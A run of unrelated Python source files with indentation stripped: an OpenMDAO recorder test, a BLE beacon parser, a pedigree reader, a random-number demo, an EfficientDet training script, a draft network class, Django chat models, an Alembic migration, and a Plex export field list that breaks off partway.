prob.root.connect('G1.P1.x', 'C1.a')
prob.root.connect('G1.P2.x', 'C1.b')
prob.driver.add_recorder(self.recorder)
self.recorder.options['record_metadata'] = True
prob.setup(check=False)
prob.cleanup()
# do some basic tests to make sure the model_viewer_data was recorded correctly
if self.comm.rank == 0:
db = SqliteDict(self.filename, self.tablename_metadata)
model_viewer_data = db['model_viewer_data']
tr = model_viewer_data['tree']
self.assertEqual(set(['name', 'type', 'subsystem_type', 'children']), set(tr.keys()))
names = []
for ch1 in tr['children']:
# each is an ordereddict
names.append(ch1["name"] )
for ch2 in ch1["children"]:
names.append(ch2["name"] )
if "children" in ch2:
for ch3 in ch2["children"]:
names.append(ch3["name"] )
expected_names = ['G1', 'P1', 'x', 'P2', 'x', 'C1', 'a', 'b',
'in_string', 'in_list', 'c', 'd', 'out_string', 'out_list']
self.assertEqual( sorted(expected_names), sorted(names))
cl = model_viewer_data['connections_list']
for c in cl:
self.assertEqual(set(['src', 'tgt']), set(c.keys()))
db.close()
def test_driver_doesnt_records_metadata(self):
size = 3
prob = Problem(Group(), impl=impl)
G1 = prob.root.add('G1', ParallelGroup())
G1.add('P1', IndepVarComp('x', np.ones(size, float) * 1.0))
G1.add('P2', IndepVarComp('x', np.ones(size, float) * 2.0))
prob.root.add('C1', ABCDArrayComp(size))
prob.root.connect('G1.P1.x', 'C1.a')
prob.root.connect('G1.P2.x', 'C1.b')
prob.driver.add_recorder(self.recorder)
self.recorder.options['record_metadata'] = False
prob.setup(check=False)
prob.cleanup()
self.assertMetadataRecorded(None)
if __name__ == "__main__":
from openmdao.test.mpi_util import mpirun_tests
mpirun_tests()
|
import struct
from enum import Enum
from collections import namedtuple
from typing import List, Dict
from src.utils import *
ibeacon_base_format = '!16s2s2sb'
ibeacon_base_vars = ['UUID', 'Major', 'Minor', 'RSSI']
eddystone_base_format = '!10s6sb'
eddystone_base_vars = ['Namespace', 'InstanceID', 'RSSI']
types = namedtuple('BeaconTypesInfo', ['fmt', 'assign_vars'])
class ParsingError(Exception):
""" Something goes wrong in parsing """
class UnknownType(ParsingError):
""" Beacon type is undefined """
def __init__(self, flag):
self.message = f'Unknown beacon type ({flag})'
super().__init__(self.message)
class InsufficientPacketSize(ParsingError):
""" Packet size insufficiency """
def __init__(self, size, required_size):
self.message = f'Have {size//2} bytes but required >={required_size//2} bytes'
super().__init__(self.message)
class BeaconTypes(Enum):
iBeacon_RSSI = types(ibeacon_base_format, ibeacon_base_vars)
iBeacon_RSSI_BV = types(ibeacon_base_format+'H', ibeacon_base_vars+['voltage'])
iBeacon_RSSI_BV_TEMP = types(ibeacon_base_format+'HH', ibeacon_base_vars+['voltage', 'temp'])
Eddystone_RSSI = types(eddystone_base_format, eddystone_base_vars)
Eddystone_RSSI_BV = types(eddystone_base_format+'H', eddystone_base_vars+['voltage'])
Eddystone_RSSI_BV_TEMP = types(eddystone_base_format+'HH', eddystone_base_vars+['voltage', 'temp'])
class BeaconParser:
@staticmethod
def parse(packet: bytes) -> List[Dict]:
all_data = []
packet, data_part = extract_ubyte(packet)
while len(packet)>0:
packet, flag = extract_ubyte(packet)
beacon_type = BeaconParser.define_beacon_type(flag)
fmt_size = struct.calcsize(beacon_type.value.fmt)*2
if len(packet)<fmt_size:
raise InsufficientPacketSize(len(packet), fmt_size)
packet, data = BeaconParser.assign_to_vars(packet, beacon_type)
all_data.append(data)
return all_data
@staticmethod
def assign_to_vars(packet: bytes, btype: types) -> dict:
type_info = btype.value
size = struct.calcsize(type_info.fmt)
p = binascii.a2b_hex(packet[:size*2])
unpacked = struct.unpack(type_info.fmt, p)
data = []
for var in unpacked:
if isinstance(var, bytes):
data.append(binascii.hexlify(var).decode('ascii'))
else:
data.append(var)
data = dict(zip(type_info.assign_vars, data))
data["BeaconType"] = btype.name
return packet[size*2:], data
@staticmethod
def define_beacon_type(flag: int) -> types:
if flag == 33:
beacon_type = BeaconTypes.iBeacon_RSSI
elif flag == 35:
beacon_type = BeaconTypes.iBeacon_RSSI_BV
elif flag == 39:
beacon_type = BeaconTypes.iBeacon_RSSI_BV_TEMP
elif flag == 1:
beacon_type = BeaconTypes.Eddystone_RSSI
elif flag == 3:
beacon_type = BeaconTypes.Eddystone_RSSI_BV
elif flag == 7:
beacon_type = BeaconTypes.Eddystone_RSSI_BV_TEMP
else:
raise UnknownType(flag)
return beacon_type
|
from __future__ import print_function
# read a pedigree and store info in a dictionary
class Pedigree:
def __init__(self, ped, samples):
# dict of list of samples in family
self.samples_by_family = {}
# dict of family by sample
self.families_by_sample = {}
# all info from ped file
self.samples = {}
for line in ped:
if line[0] == '#' or line == '\n':
continue
try:
fam, iid, fid, mid = line.split('\t')[0:4]
except ValueError:
print('Line in pedigree incorrectly formatted:\n"{}"\n'.format(line))
continue
if iid not in samples:
continue
if fam in self.samples_by_family:
self.samples_by_family[fam].append(iid)
else:
self.samples_by_family[fam] = [iid]
self.families_by_sample[iid] = fam
self.samples[iid] = (fam, iid, fid, mid)
for s in samples:
if s not in self.samples:
print('Warning: sample {} not in pedigree\n'.format(s))
|
# For statistic operation
from library.math_tool_box import StatMaker
# for random number generator
from library.linear_congruedntial_generator import random_number_gen
# For measuring elapsed time elapsed
from library.measure_time_performance import measure_elapsed_time
### 1. Generate 5 random numbers
random_number_list = random_number_gen( length =5 )
print("\n 5 random numbers are generated as below:")
print( random_number_list )
print()
### 2. Generate N random numbers between -1 and 1, and calculates their average and standard deviation.
# Note: N = 10^1, 10^2, 10^3, 10^4, 10^5
### 3. Measure elapsed time of random number generation on each iteration.
### 4. Design and implemnet a random number generator
# Note: This item is completed, and it is saved in library.linear_congruedntial_generator
size_array = []
output_array = []
for n in range( 1, 6 ):
size_array.append( 10**n )
for i in range( 0, 5 ):
length = size_array[i]
output_array.append( measure_elapsed_time(random_number_gen, length, -1, 1, True ) )
statistic_info = StatMaker( output_array[i] )
print("Average of list with length {0} = {1}".format( length, statistic_info.get_avg() ) )
print("Standard deviation of list with length {0} = {1}".format( length, statistic_info.get_std() ) )
print()
'''
Example output:
### 1. Generate 5 random numbers
5 random numbers are generated as below:
[1255046, 452783350, 1364012331, 390612681, 358303891]
### 2. Generate N random numbers between -1 and 1, and calculates their average and standard deviation.
N = 10^1, 10^2, 10^3, 10^4, 10^5
### 3. Measure elapsed time of random number generation on each iteration.
### 4. Design and implemnet a random number generator
This item is completed, and it is saved in library.linear_congruedntial_generator
random_number_gen took 0.031289000 ms to run
Average of list with length 10 = 0.12344294369541378
Standard deviation of list with length 10 = 0.6970713923615578
random_number_gen took 0.168960000 ms to run
Average of list with length 100 = 0.04805143085126898
Standard deviation of list with length 100 = 0.5999758690220189
random_number_gen took 1.527465000 ms to run
Average of list with length 1000 = 0.0023875394355389636
Standard deviation of list with length 1000 = 0.5877759267632492
random_number_gen took 15.660929000 ms to run
Average of list with length 10000 = -0.004161540137474938
Standard deviation of list with length 10000 = 0.5781747512114019
random_number_gen took 153.725024000 ms to run
Average of list with length 100000 = -0.0035780554856993775
Standard deviation of list with length 100000 = 0.5787522721242679
''' |
# add common library
from logger import logger, log
logger.setup('./logs', name='efficientDet-d5-cutmix-sgd')
from lib import *
from config import config
from dataset import WheatDataset, get_train_transforms, get_valid_transforms
from utils import seed_everything, read_csv, kfold
from trainer import Trainner, collate_fn
from efficientdet_master.effdet import get_efficientdet_config, EfficientDet, DetBenchTrain
from efficientdet_master.effdet.efficientdet import HeadNet
def get_net():
# config = get_efficientdet_config('tf_efficientdet_d7')
# net = EfficientDet(config, pretrained_backbone=False)
# checkpoint = torch.load('./input/efficientdet/tf_efficientdet_d7-f05bf714.pth') #D7
net_config = get_efficientdet_config('tf_efficientdet_d5')
net = EfficientDet(net_config, pretrained_backbone=config.use_pretrained)
checkpoint = torch.load('./input/efficientdet/tf_efficientdet_d5-ef44aea8.pth') #D5
net.load_state_dict(checkpoint)
net_config.num_classes = 1
net_config.image_size = 1024
net.class_net = HeadNet(net_config, num_outputs=net_config.num_classes, norm_kwargs=dict(eps=.001, momentum=.01))
return DetBenchTrain(net, net_config)
def run_training(fold_number):
seed_everything(config.seed)
device = torch.device(config.device)
# read csv
data_frame = read_csv(config.train_csv)
# create stratify kfold
df_folds = kfold(data_frame)
# create dataset
train_dataset = WheatDataset(
image_ids=df_folds[df_folds['fold'] != fold_number].index.values,
data_frame=data_frame,
transforms=get_train_transforms(),
test=False,
)
validation_dataset = WheatDataset(
image_ids=df_folds[df_folds['fold'] == fold_number].index.values,
data_frame=data_frame,
transforms=get_valid_transforms(),
test=True,
)
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=config.batch_size,
sampler=RandomSampler(train_dataset),
pin_memory=False,
drop_last=True,
num_workers=config.num_workers,
collate_fn=collate_fn,
)
val_loader = torch.utils.data.DataLoader(
validation_dataset,
batch_size=config.batch_size,
num_workers=config.num_workers,
shuffle=False,
sampler=SequentialSampler(validation_dataset),
pin_memory=False,
collate_fn=collate_fn,
)
# model
model = get_net()
if len(config.gpu_ids) > 1:
model = nn.DataParallel(model)
model.to(device)
# training
trainer = Trainner(model=model, config=config, fold_number=fold_number)
trainer.train(train_loader, val_loader)
if __name__ == '__main__':
#train 5 folds
for i in range(5):
log.info(f'Fold {i}')
run_training(fold_number=i)
|
from dataclasses import dataclass
from typing import Any, Callable, Dict, List, TypeVar
import torch
from torch import Tensor
import pytorch_lightning as pl
class Node(dataclass):
size: torch.Size
name: str = None
pooling_function: Callable[[Tensor], Tensor] = torch.sum
activation_function: Callable[[Tensor], Tensor] = lambda x: x
initialization_function: Callable[[torch.Size], Tensor] = torch.zeros
class Connection(dataclass):
srcs: List[Node]
dsts: List[Node]
fn: Callable[[List[Tensor]], List[Tensor]]
@property
def trainable_params(self) -> List[Tensor]:
if hasattr(self.fn, 'parameters'):
return self.fn.parameters()
else:
return []
class MPNet(dataclass, pl.LightningModule):
nodes: List[Node]
connections: List[Connection]
# TODO store the state optimizer in the state dict
state_optimizer_fn: Callable[[], torch.optim.Optimizer]
# ptl stores the model's optimizer in `.optimizer()` parameter_optimizer: torch.optim.Optimizer
@property
def parameters(self) -> List[Tensor]:
return [param for connection in self.connections
for param in connection.parameters()]
def __init__(self, nodes: List[Node], connections: List[Connection]):
super().__init__()
self.nodes = nodes
self.connections = connections
# TODO: implement pl.LightningModule.forward and other methods
@property
def _initial_state(self) -> Dict[Node, Tensor]:
return {node: node.initialization_function(node.size)
for node in self.nodes}
def _update(self, vals: Dict[Node, Tensor]):
# clear gradients
# forward pass
vals = self._forward(vals)
# backward pass on state variables
for node in self.nodes:
# TODO
vals[node]._grad += vals[node].backward()
# backward pass on trainable parameters
def _forward(self, vals: Dict[Node, Tensor]) -> Dict[Node, Tensor]:
# compute buckets
buckets = {node: [] for node in self.nodes}
for connection in self.connections:
inputs = [vals[src] for src in connection.srcs]
outputs = connection.fn(inputs)
for output, dst in zip(outputs, connection.dsts):
buckets[dst].append(output)
# pool bucket values and apply activation function
for node in self.nodes:
vals[node] = node.activation_function(
node.pooling_function(buckets[node]))
return vals
|
from django.db import models
from django.conf import settings
import time
import json
from datetime import datetime
import hashlib
import uuid
from wsgiref.handlers import format_date_time
from django.core.urlresolvers import reverse
from authz_group.models import Crowd
class Thread(models.Model):
name = models.CharField(max_length=100, unique=True, db_column='name')
description = models.CharField(max_length=1000, db_column='description')
is_private = models.NullBooleanField(db_column='is_private', null=True)
is_deleted = models.NullBooleanField(db_column='is_deleted', null=True)
has_groups = models.BooleanField(db_column='has_groups')
def person_has_access(self, person):
# Private threads
if self.is_private:
person_ids = self.name.split("|")
for pid in person_ids:
if int(pid) == int(person.person_id):
return True
return False
# thread managers
if self.is_manager(person):
return True
# Legacy auth
try:
auth_entry = AuthList.objects.get(thread = self, person = person)
if auth_entry.pk:
return True
except AuthList.DoesNotExist:
pass
try:
has_auth_entry = AuthList.objects.get(thread = self)
if has_auth_entry.pk:
return False
except AuthList.DoesNotExist:
pass
# Group auth
try:
group_links = GroupLink.objects.filter(thread = self)
for link in group_links:
crowd = Crowd.objects.get(pk = link.group_id)
if crowd.is_member(person.login_name):
return True
if self.has_groups:
return False
except GroupLink.DoesNotExist:
pass
return True
def is_manager(self, person):
try:
manager_entry = ThreadManager.objects.get(thread = self, person = person)
if manager_entry.pk:
return True
except ThreadManager.DoesNotExist:
return False
def get_other_person(self, person):
if not self.is_private:
raise Exception("No other person for non-private thread")
id1, id2 = self.name.split('|')
if id1 == id2:
return person
person1, person2 = Person.objects.filter(person_id__in = [id1, id2])
if person1.person_id == person.person_id:
return person2
return person1
def json_data(self, person=None):
data = {
"id": self.pk,
"name": self.name,
"description": self.description,
"is_private": self.is_private,
"has_groups": self.has_groups,
"managers": []
}
if self.is_private and person:
person_ids = self.name.split("|")
pid = None
if int(person_ids[0]) == person.pk:
pid = person_ids[1]
else:
pid = person_ids[0]
other_person = Person.objects.get(person_id = pid)
data["login_name"] = other_person.login_name
managers = ThreadManager.objects.filter(thread = self)
for manager in managers:
data["managers"].append(manager.json_data())
return data
class Meta:
db_table = 'thread'
class Person(models.Model):
person_id = models.AutoField(primary_key = True, db_column = 'person_id')
login_name = models.TextField(max_length=128, db_column='login_name')
name = models.TextField(max_length=255, db_column='name')
date_modified = models.DateTimeField(db_column='date_modified')
def json_data(self):
data = {
"id": self.person_id,
"login_name": self.login_name,
"name": self.name,
"attributes": {},
}
attributes = PersonAttribute.objects.filter(person=self)
for attribute in attributes:
data["attributes"][attribute.attribute] = attribute.value
if attribute.attribute == "yarn_avatar_id":
hashval = hashlib.md5("%s-%s" % ( self.pk, settings.SECRET_KEY)).hexdigest()
data["avatar_url"] = reverse('yarn.views.view_avatar', kwargs = { 'person_id': self.pk, 'verify_hash': hashval })
return data
def save(self, *args, **kwargs):
self.date_modified = datetime.now()
super(Person, self).save(*args, **kwargs)
class Meta:
db_table = 'Person'
class PersonAttribute(models.Model):
id = models.AutoField(db_column='person_attribute_id', primary_key=True)
attribute = models.CharField(max_length = 255, db_column='attribute')
value = models.TextField(db_column='value')
person = models.ForeignKey(Person, db_column='person_id')
class Meta:
db_table = 'PersonAttribute'
class AuthList(models.Model):
""" Legacy access controls - should use group access now """
person = models.ForeignKey(Person)
thread = models.ForeignKey(Thread)
class Meta:
db_table = 'auth_list'
unique_together = ('thread', 'person')
class GroupLink(models.Model):
thread = models.ForeignKey(Thread)
group_id = models.IntegerField(db_column = 'group_id')
class Meta:
db_table = 'group_auth'
unique_together = ('thread', 'group_id')
class ThreadManager(models.Model):
person = models.ForeignKey(Person)
thread = models.ForeignKey(Thread)
def json_data(self):
return self.person.json_data()
class Meta:
db_table = 'thread_manager'
unique_together = ('thread', 'person')
class ThreadNotification(models.Model):
thread = models.ForeignKey(Thread)
person = models.ForeignKey(Person)
is_new = models.BooleanField(db_column = "is_new")
def json_data(self, person):
other_person = self.thread.get_other_person(person)
return {
"login_name": other_person.login_name,
"thread_id": self.thread.pk,
}
class Meta:
db_table = 'thread_notifications'
unique_together = ('thread', 'person')
class Artifact(models.Model):
description = models.TextField(db_column='description')
timestamp = models.DateTimeField(db_column='timestamp')
artifact_type = models.CharField(max_length=128, db_column='type', null=True)
thread = models.ForeignKey(Thread, db_column='thread_id')
person = models.ForeignKey(Person, db_column='person_id')
bot = models.TextField(db_column='bot')
def json_data(self):
data = {
"id": self.pk,
"description": self.description,
"type": self.artifact_type,
"thread_id": self.thread.pk,
"timestamp": None,
"bot": self.bot
}
if self.timestamp:
data["timestamp"] = format_date_time(time.mktime(self.timestamp.timetuple()))
if self.artifact_type == "file":
hashval = hashlib.md5("%s-%s-%s" % ( self.thread.pk, self.description, settings.SECRET_KEY)).hexdigest()
data["download_url"] = reverse('yarn.views.download_file', kwargs = {'thread_id': self.thread.pk, 'file_id': self.description, 'verify_hash': hashval })
sol_file = SolsticeFile.objects.get(pk = self.description)
data["file_name"] = sol_file.name
if sol_file.is_image():
data["is_image"] = True
data["thumbnail_url"] = reverse('yarn.views.thumbnail_file', kwargs = {'thread_id': self.thread.pk, 'file_id': self.description, 'verify_hash': hashval })
if hasattr(self, 'person'):
data["author"] = self.person.json_data()
return data
class Meta:
db_table = 'artifact'
class User(models.Model):
thread = models.ForeignKey(Thread, db_column = 'thread_id')
person = models.ForeignKey(Person, db_column = 'person_id')
is_online = models.BooleanField(db_column = 'is_online')
last_message_id = models.IntegerField(db_column = 'last_message_id')
last_online = models.DateTimeField(db_column='last_online')
class Meta:
db_table = 'user'
unique_together = ('thread', 'person')
class SolsticeFile(models.Model):
file_id = models.AutoField(db_column='file_id', primary_key=True)
person = models.ForeignKey(Person, db_column='person_id')
name = models.CharField(max_length=255, db_column='name')
content_type = models.CharField(max_length=255, db_column='content_type')
content_length = models.IntegerField(db_column='content_length')
creation_date = models.DateTimeField(db_column='creation_date')
modification_date = models.DateTimeField(db_column='modification_date')
filestore_id = models.IntegerField(db_column='filestore_id')
def is_image(self):
if self.content_type in ['image/jpeg', 'image/png', 'image/gif']:
return True
return False
def path_to_file(self):
if not hasattr(settings, "SOLSTICE_FILE_ROOT"):
raise Exception("Need to have a defined SOLSTICE_FILE_ROOT path in settings, where files will live")
md5val = hashlib.md5("%i" % self.person.pk).hexdigest()[:3]
return "%s/%s/%s/%s" % (settings.SOLSTICE_FILE_ROOT, md5val, self.person.pk, self.pk)
class Meta:
db_table = 'File'
class SolsticeFileAttribute(models.Model):
attribute_id = models.AutoField(db_column='file_attribute_id', primary_key=True)
solstice_file = models.ForeignKey(SolsticeFile, db_column='file_id')
attribute = models.CharField(max_length=255, db_column='attribute')
value = models.TextField(db_column='value')
class Meta:
db_table = 'FileAttribute'
class FavoriteThreads(models.Model):
person = models.ForeignKey(Person, unique = True)
threads = models.TextField()
def favorite_id_list(self):
return json.loads(self.threads)
def set_favorite_id_list(self, ids):
self.threads = json.dumps(ids)
class WebsocketAuthToken(models.Model):
person = models.ForeignKey(Person)
secret = models.CharField(max_length=255)
date_created = models.DateTimeField()
def save(self, *args, **kwargs):
self.secret = str(uuid.uuid4())
self.date_created = datetime.now()
super(WebsocketAuthToken, self).save(*args, **kwargs)
def get_token(self):
return hashlib.md5("%s-%s" % (self.person.pk, self.secret)).hexdigest()
def validate_token(self, test_token, login_name):
person = Person.objects.get(login_name = login_name)
tokens = WebsocketAuthToken.objects.filter(person = person)
now = datetime.now()
for token in tokens:
if token.get_token() == test_token:
delta = (now - token.date_created).seconds
# Only allow 5 minute old tokens
if delta < (5 * 60):
token.delete()
return True
return False
|
"""Change parcel attachments to parcel map
Revision ID: 98db6b34d1a3
Revises: fc8dd9d7a9d7
Create Date: 2019-11-15 07:38:48.934387
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '98db6b34d1a3'
down_revision = 'fc8dd9d7a9d7'
def upgrade():
op.drop_table('parcelattachment')
op.add_column(
'parcel',
sa.Column(
'map_data',
sa.LargeBinary(length=10485760),
nullable=True
)
)
op.add_column(
'parcel',
sa.Column('map_mimetype', sa.String(length=100), nullable=True)
)
op.add_column(
'parcel',
sa.Column('map_size', sa.String(length=20), nullable=True)
)
def downgrade():
op.drop_column('parcel', 'map_size')
op.drop_column('parcel', 'map_mimetype')
op.drop_column('parcel', 'map_data')
op.create_table(
'parcelattachment',
sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False),
sa.Column(
'organization_id', sa.INTEGER(), autoincrement=False,
nullable=False
),
sa.Column(
'parcel_id', sa.INTEGER(), autoincrement=False, nullable=False
),
sa.Column(
'name', sa.VARCHAR(length=100), autoincrement=False, nullable=True
),
sa.Column(
'mimetype', sa.VARCHAR(length=100), autoincrement=False,
nullable=True
),
sa.Column(
'size', sa.VARCHAR(length=20), autoincrement=False, nullable=True
),
sa.Column(
'data', postgresql.BYTEA(), autoincrement=False, nullable=True
),
sa.ForeignKeyConstraint(
['parcel_id'],
['parcel.id'],
name='parcelattachment_parcel_id_fkey'
),
sa.PrimaryKeyConstraint('id', name='parcelattachment_pkey')
)
|
#########################################################################
# Helper file for ExportTools
# Written by dane22 on the Plex Forums, UKDTOM on GitHub
#
# This one contains the valid fields and attributes for movies
#
# To disable a field not needed, simply put a # sign in front of the line,
# and it'll be ommited.
# After above, a PMS restart is sadly req. though
# Note though, that this will be overwritten, if/when this plugin is updated
#
# If level has the number 666 in it, a column named 'PMS Media Path' will
# automaticly be added to the end
#########################################################################
# Fields that contains a timestamp and should return a date
dateTimeFields = ['addedAt', 'updatedAt', 'lastViewedAt']
# Fields that contains a timestamp and should return a time
timeFields = ['duration', 'startTimeOffset', 'endTimeOffset']
# Levels that only req. a single call towards PMS
singleCall = ['Level 1', 'Level 2', 'PlayCount 1']
# Levels for PlayCount
playCountCall = ['PlayCount 1']
# Define rows and element name for level 1 (Single call)
Level_1 = [
('Media ID',
'@ratingKey'),
('Title',
'@title'),
('Sort title',
'@titleSort'),
('Studio',
'@studio'),
('Content Rating',
'@contentRating'),
('Year',
'@year'),
('Rating',
'@rating'),
('Summary',
'@summary'),
('Genres',
'Genre/@tag')
]
# Define rows and element name for level 2 (Single Call)
Level_2 = [
('View Count',
'@viewCount'),
('Last Viewed at',
'@lastViewedAt'),
('Tagline',
'@tagline'),
('Release Date',
'@originallyAvailableAt'),
('Writers',
'Writer/@tag'),
('Country',
'Country/@tag'),
('Duration',
'@duration'),
('Directors',
'Director/@tag'),
('Roles',
'Role/@tag'),
('Audience Rating',
'@audienceRating'),
('User Rating',
'@userRating')
]
# Define rows and element name for level 3 (One call pr. movie)
Level_3 = [
('Labels',
'Label/@tag'),
('Locked Fields',
'Field/@name'),
('Extras',
'Extras/@size'),
('Extras-behindthescenes',
'Extras/Video[@subtype="behindTheScenes"]'),
('Extras-deleted',
'Extras/Video[@subtype="deleted"]'),
('Extras-featurette',
'Extras/Video[@subtype="featurette"]'),
('Extras-interview',
'Extras/Video[@subtype="interview"]'),
('Extras-scene',
'Extras/Video[@subtype="scene"]'),
('Extras-short',
'Extras/Video[@subtype="short"]'),
('Extras-trailer',
'Extras/Video[@subtype="trailer"]'),
('Collections',
'Collection/@tag'),
('Original Title',
'@originalTitle'),
('Added',
'@addedAt'),
('Updated',
'@updatedAt'),
('Audio Languages',
'Media/Part/Stream[@streamType=2]/@languageCode'),
('Audio Title',
'Media/Part/Stream[@streamType=2]/@title'),
('Subtitle Languages',
'Media/Part/Stream[@streamType=3]/@languageCode'),
('Subtitle Title',
'Media/Part/Stream[@streamType=3]/@title'),
('Subtitle Codec',
'Media/Part/Stream[@streamType=3]/@codec'),
('Subtitle Forced',
'Media/Part/Stream[@streamType=3]/@forced'),
('Accessible',
'Media/Part/@accessible'),
('Exists',
'Media/Part/@exists'),
('MetaDB Link',
'@guid'),
('MetaData Language',
'@guid'),
('IMDB ID',
'//Guid[starts-with(@id, "imdb")]/@id'),
('IMDB Link',
'//Guid[starts-with(@id, "imdb")]/@id'),
('TMDB ID',
'//Guid[starts-with(@id, "tmdb")]/@id'),
('TMDB Link',
'//Guid[starts-with(@id, "tmdb")]/@id'),
('Poster url',
'@thumb'),
('Art url',
'@art'),
('Chapter Source',
'@chapterSource'),
('Chapter Title',
'Chapter/@tag'),
('Chapter Count',
'Chapter/@index')
]
# Define rows and element name for level 4 (One call pr. movie)
Level_4 = [
('Video Resolution',
'Media/@videoResolution'),
('Bitrate',
'Media/@bitrate'),
('Width',
'Media/@width'),
('Height',
'Media/@height'),
('Aspect Ratio',
'Media/@aspectRatio'),
('Audio Channels',
'Media/@audioChannels'),
('Audio Codec',
'Media/@audioCodec'),
('Video Codec',
'Media/@videoCodec'),
('Container',
'Media/@container'),
('Video FrameRate',
'Media/@videoFrameRate')
]
# Define rows and element name for level 5 (Part info) (One call pr. movie)
Level_5 = [
('Part File Combined',
'Media/Part/@file'),
('Part File',
'Media/Part/@file'),
('Part File Path',
'Media/Part/@file'),
('Part Size',
'Media/Part/@size'),
('Part Size as Bytes',
'Media/Part/@size'),
('Part Indexed',
'Media/Part/@indexes'),
('Part Duration',
'Media/Part/@duration'),
('Part Container',
'Media/Part/@container'),
('Part Optimized for Streaming',
'Media/Part/@optimizedForStreaming'),
('Part Deep Analysis Version',
'Media/Part/@deepAnalysisVersion'),
('Required Bandwidths',
'Media/Part/@requiredBandwidths')
]
# Define rows and element name for level 6 (Video Stream Info)
# (One call pr. movie)
Level_6 = [
('Video Stream Title',
'Media/Part/Stream[@streamType=1]/@title'),
('Video Stream Default',
'Media/Part/Stream[@streamType=1]/@default'),
('Video Stream Index',
'Media/Part/Stream[@streamType=1]/@index'),
('Video Stream Pixel Format',
'Media/Part/Stream[@streamType=1]/@pixelFormat'),
('Video Stream Profile',
'Media/Part/Stream[@streamType=1]/@profile'),
('Video Stream Ref Frames',
'Media/Part/Stream[@streamType=1]/@refFrames'),
('Video Stream Scan Type',
'Media/Part/Stream[@streamType=1]/@scanType'),
('Video Stream Stream Identifier',
'Media/Part/Stream[@streamType=1]/@streamIdentifier'),
('Video Stream Width',
'Media/Part/Stream[@streamType=1]/@width'),
('Video Stream Pixel Aspect Ratio',
'Media/Part/Stream[@streamType=1]/@pixelAspectRatio'),
('Video Stream Height',
'Media/Part/Stream[@streamType=1]/@height'),
('Video Stream Has Scaling Matrix',
'Media/Part/Stream[@streamType=1]/@hasScalingMatrix'),
('Video Stream Frame Rate Mode',
'Media/Part/Stream[@streamType=1]/@frameRateMode'),
('Video Stream Frame Rate',
'Media/Part/Stream[@streamType=1]/@frameRate'),
('Video Stream Codec',
'Media/Part/Stream[@streamType=1]/@codec'),
('Video Stream Codec ID',
'Media/Part/Stream[@streamType=1]/@codecID'),
('Video Stream Chroma Sub Sampling',
'Media/Part/Stream[@streamType=1]/@chromaSubsampling'),
('Video Stream Color Primaries',
'Media/Part/Stream[@streamType=1]/@colorPrimaries'),
('Video Stream Color Range',
'Media/Part/Stream[@streamType=1]/@colorRange'),
('Video Stream Color Space',
'Media/Part/Stream[@streamType=1]/@colorSpace'),
('Video Stream Color Trc',
'Media/Part/Stream[@streamType=1]/@colorTrc'),
('Video Stream Cabac',
'Media/Part/Stream[@streamType=1]/@cabac'),
('Video Stream Anamorphic',
'Media/Part/Stream[@streamType=1]/@anamorphic'),
('Video Stream Language Code',
'Media/Part/Stream[@streamType=1]/@languageCode'),
('Video Stream Language',
'Media/Part/Stream[@streamType=1]/@language'),
('Video Stream Bitrate',
'Media/Part/Stream[@streamType=1]/@bitrate'),
('Video Stream Bit Depth',
'Media/Part/Stream[@streamType=1]/@bitDepth'),
('Video Stream Duration',
'Media/Part/Stream[@streamType=1]/@duration'),
('Video Stream Required Bandwidths',
'Media/Part/Stream[@streamType=1]/@requiredBandwidths'),
('Video Stream Level', 'Media/Part/Stream[@streamType=1]/@level'),
('Audio Stream Selected',
'Media/Part/Stream[@streamType=2]/@selected'),
('Audio Stream Default',
'Media/Part/Stream[@streamType=2]/@default'),
('Audio Stream Codec',
'Media/Part/Stream[@streamType=2]/@codec'),
('Audio Stream Index',
'Media/Part/Stream[@streamType=2]/@index'),
('Audio Stream Channels',
'Media/Part/Stream[@streamType=2]/@channels'),
('Audio Stream Bitrate',
'Media/Part/Stream[@streamType=2]/@bitrate'),
('Audio Stream Language',
'Media/Part/Stream[@streamType=2]/@language'),
('Audio Stream Language Code',
'Media/Part/Stream[@streamType=2]/@languageCode'),
('Audio Stream Audio Channel Layout',
'Media/Part/Stream[@streamType=2]/@audioChannelLayout'),
('Audio Stream Bit Depth',
'Media/Part/Stream[@streamType=2]/@bitDepth'),
('Audio Stream Bitrate Mode',
'Media/Part/Stream[@streamType=2]/@bitrateMode'),
('Audio Stream Codec ID',
'Media/Part/Stream[@streamType=2]/@codecID'),
('Audio Stream Duration',
'Media/Part/Stream[@streamType=2]/@duration'),
('Audio Stream Profile',
'Media/Part/Stream[@streamType=2]/@profile'),
('Audio Stream Sampling Rate',
'Media/Part/Stream[@streamType=2]/@samplingRate'),
('Audio Stream Required Bandwidths',
'Media/Part/Stream[@streamType=2]/@requiredBandwidths'),
('Subtitle Stream Codec',
'Media/Part/Stream[@streamType=3]/@codec'),
('Subtitle Stream Index',
'Media/Part/Stream[@streamType=3]/@index'),
('Subtitle Stream Language',
'Media/Part/Stream[@streamType=3]/@language'),
('Subtitle Stream Language Code',
'Media/Part/Stream[@streamType=3]/@languageCode'),
('Subtitle Stream Codec ID',
'Media/Part/Stream[@streamType=3]/@codecID'),
('Subtitle Stream Format',
'Media/Part/Stream[@streamType=3]/@format'),
('Subtitle Stream Title',
'Media/Part/Stream[@streamType=3]/@title'),
('Subtitle Stream Selected',
'Media/Part/Stream[@streamType=3]/@selected'),
('Subtitle Stream Required Bandwidths',
'Media/Part/Stream[@streamType=3]/@requiredBandwidths'),
('Subtitle Header Compression',
'Media/Part/Stream[@streamType=3]/@headerCompression')
]
# Define rows and element name for extreme level 7 (One call pr. movie)
Level_7 = [
]
# Define rows and element name for extreme level 8 (One call pr. movie)
Level_8 = [
]
# Define rows and element name for extreme level 9 (One call pr. movie)
Level_9 = {
}
# Define rows and element name for level 666 (Two calls pr. movie)
Level_666 = [
# ('PMS Media Path' , 'hash') # Field auto added
# ('PMS Metadata Path' , 'SHA1') # Field auto added
]
# Define rows and element name for Special level 1 (one call pr. movie)
SLevel_1 = [
('Title',
'@title'),
('Year',
'@year'),
('Release Date',
'@originallyAvailableAt'),
('Audio Languages',
'Media/Part/Stream[@streamType=2]/@languageCode')
]
# Define rows and element name for Special level 2 (one call pr. movie)
SLevel_2 = [
('Title',
'@title'),
('Audio Stream Language',
'Media/Part/Stream[@streamType=2]/@language'),
('Audio Title',
'Media/Part/Stream[@streamType=2]/@title'),
('Container',
'Media/@container'),
('Part File',
'Media/Part/@file'),
('Audio Stream Index',
